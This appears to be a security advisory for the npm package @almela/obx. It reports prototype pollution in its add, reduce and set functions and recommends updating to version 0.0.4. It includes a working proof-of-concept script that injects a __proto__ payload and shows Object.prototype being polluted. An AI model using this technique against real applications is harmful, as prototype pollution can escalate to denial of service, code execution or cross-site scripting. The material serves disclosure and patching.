The module is vulenrable via three functions: , located at add (obx/build/index.js:656)
, reduce (@almela/obx/build/index.js:470)
, Object.set (obx/build/index.js:269)
, respectively. In all these implementations, the assignment of the property from source to destination occurred without proper protection.
An attacker can be exploit this method to inject malicious payload via built-in Object
through the special properties __proto__
or constructor.prototype
.
Thus, the attacker can use one of these properties to pollute the application logic that can be escalated to Denial of service,
remote code execution or cross-site scripting attacks.
(async () => {
const lib = await import('@almela/obx');
var BAD_JSON = JSON.parse('{"__proto__":{"polluted":true}}');
var victim = {}
console.log("Before Attack: ", JSON.stringify(victim.__proto__));
try {
// Un-comment on at a time
lib.add ({}, BAD_JSON)
//lib.cp ({ "__proto__.polluted": true})
//lib.default.set ({}, "__proto__.polluted", true)
} catch (e) { }
console.log("After Attack: ", JSON.stringify(victim.__proto__));
delete Object.prototype.polluted;
})();
Output:
Before Attack: {}
After Attack: {"polluted":true}
Output of a successful fix:
Before Attack: {}
After Attack: {}
Update the package to 0.0.4